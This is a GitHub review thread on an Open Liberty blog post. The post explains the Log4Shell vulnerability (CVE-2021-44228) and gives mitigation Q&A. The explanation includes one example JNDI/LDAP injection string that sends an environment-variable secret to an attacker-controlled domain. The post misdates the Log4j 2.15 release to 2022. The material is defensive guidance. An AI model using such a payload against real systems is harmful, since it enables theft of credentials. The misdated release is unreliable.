Liberty guides on log4j CVE-2021-44228 (#1976)
OpenLiberty/blogs: posts/2021-12-15-liberty-guide-log4j-cve.adoc

---
layout: post

> title: "Liberty Guide on Log4j2 CVE-2021-44228"

Reviewer: I know this is only applicable to log4j2, but I think we should drop the '2' from the title and description as I think most places reference it as the `log4j` vulnerability (likewise the jars are like `log4j-core` don't have a 2).  Also, most of the blog references it as `Log4J`
```suggestion
title: "Liberty Guide on Log4j CVE-2021-44228 (Log4Shell)"
```

# Do NOT change the categories section
categories: blog
author_picture: https://avatars.githubusercontent.com/u/10999780?s=460&u=1a66e468c70e84f54bf5a75c27881cc6133ccc20&v=4
author_github: https://github.com/Emily-Jiang

> seo-title: Liberty Guide on Log4j CVE-2021-44228

Reviewer: I know this is only applicable to log4j2, but I think we should drop the '2' from the title and description as I think most places reference it as the log4j vulnerability (likewise the jars are like log4j-core don't have a 2).
```suggestion
seo-title: Liberty Guide on Log4j CVE-2021-44228 (Log4Shell)
```

> seo-description: Open Liberty Guide on understanding and solving Log4j2 CVE-2021-44228

Reviewer: ```suggestion
seo-description: Open Liberty Guide on understanding and solving Log4j CVE-2021-44228 (Log4Shell)
```

> blog_description: Open Liberty provides this essential guide for Open Liberty customers to understand Log4j2 CVE-2021-44228 and the suggestions how to mitigate this thread 

Reviewer: ```suggestion
blog_description: Open Liberty provides this essential guide for Open Liberty customers to understand Log4j2 CVE-2021-44228 and the suggestions how to mitigate this threat
```

Reviewer: ```suggestion
blog_description: Open Liberty provides this essential guide for Open Liberty customers to understand Log4j CVE-2021-44228 (Log4Shell) and the suggestions how to mitigate this threat 
```

open-graph-image: https://openliberty.io/img/twitter_card.jpg
additional_authors:
- name: Alasdair Nottingham
  github: https://github.com/nottycode
  image: https://avatars3.githubusercontent.com/nottycode
---

> On December 10th 2022 the Apache Logging project released a 2.15 release for Log4j2 a popular Java logging framework to address a CVSS 10 scored CVE-2021-44228 known as Log4Shell. 

Reviewer: ```suggestion
On December 10th 2022 the Apache Logging project released a 2.15 release for Log4j2, a popular Java logging framework, to address a CVSS 10 scored CVE-2021-44228 known as Log4Shell. 
```

CVSS 10 is the highest severity score that can be assigned.

> The Log4Shell vulnerability occurs due to a combination of a message lookup feature in Log4J and how the Java Naming and Directory (JNDI) API works when connecting via LDAP.when connecting via LDAP. 

Reviewer: ```suggestion
The Log4Shell vulnerability occurs due to a combination of a message lookup feature in Log4J V2 and how the Java Naming and Directory (JNDI) API works when connecting via LDAP. 
```

To add to the risk present by this lookup function the lookup function is recursive allowing for data exfiltration. Data exfiltration maybe possible even if the targeted LDAP server is not reachable. 
For example a string like `${jndi:ldap://${env.security_token}.<attacker domain>/a}` would resolve the security_token environment variable from the shell and then do a DNS lookup to resolve the IP address using the attackers controlled DNS server providing the hacker with the value of the security token.

Since the original `Log4Shell` Apache has issued two further CVEs affecting Log4J CVE-2021-4104 and CVE-2021-45046. 
As a result of this the recommendation is to upgrade all log4j usage to at least the 2.16 version.

Open Liberty does not ship log4j and as a result any data logged by Open Liberty will not put you at risk. 
However log4j is a widely used framework and your applications may make use of Log4J as a result we have prepared the following Q&A for developers seeking advice:

* Q1. If my applications use log4j, which version of log4j should I use to be safe?

> You should update the version of `log4j2` to `2.16`. 

Reviewer: Can we change this to  something like
```suggestion
You should update the version of `log4j2` to the latest version or `2.16` at a minimum. 
```

Author: At the moment, 2.16 is the latest version. I will reword a bit.

* Q2. If I am running with latest version of Java, am i protected? Do i still need to follow remediate steps? 

`CVE-2021-44228`is specific to Log4J V2 and has nothing to do with Java or its level. Features in the most recent releases of Java mitigate some, but not all of the risk. 

* Q3. It will take a long time to update all our applications is there anything we can do to mitigate in the meantime?

> Provided `log4j` 2.10 or newer is being used setting the Java System property  log4j2.formatMsgNoLookups to true will mitigate the issue. Setting an environment variable to `LOG4J_FORMAT_MSG_NO_LOOKUPS=true` will also have the same effect. These steps will not mitigate `CVE-2021-45046`.

Reviewer: ```suggestion
Provided `log4j` 2.10 or newer is being used setting the Java System property log4j2.formatMsgNoLookups to true will mitigate the issue. Setting an environment variable to `LOG4J_FORMAT_MSG_NO_LOOKUPS=true` will also have the same effect. These steps will not mitigate `CVE-2021-45046`.
```

* Q4 How can I configure Liberty with log4j2.formatMsgNoLookups?

Create a jvm.options file in `${wlp.user.dir}/shared/jvm.options` with `-Dlog4j2.formatMsgNoLookups=true` on a line by itself. Then restart all servers for it to take effect. This will apply to all servers in that user dir.

* Q5. I cannot find `org/apache/logging/log4j/core/lookup/JndiLookup.class` in my log4j jar, am I vulnerable?

> It is unlikely you are vulnerable. Most likely you are running log4j1 which is not vulnerable.

Reviewer: ```suggestion
It is unlikely you are vulnerable. Most likely you are running log4j1 which is not vulnerable to CVE-2021-44228.
```

* Q6. Could setting `log4j2.formatMsgNoLookups=true` have an effect on log4j 1.x or other non-log4j applications? Is it safe to set this parameter until we have checked every custom written part in our WAS environments? 

> The setting should have no affect on non-log4j or log4j 1.x. It is a property related to log4j 2.x behavior.

Reviewer: ```suggestion
The setting should have no affect on non-log4j or log4j 1.x libraries. It is a property related to log4j 2.x behavior.
```
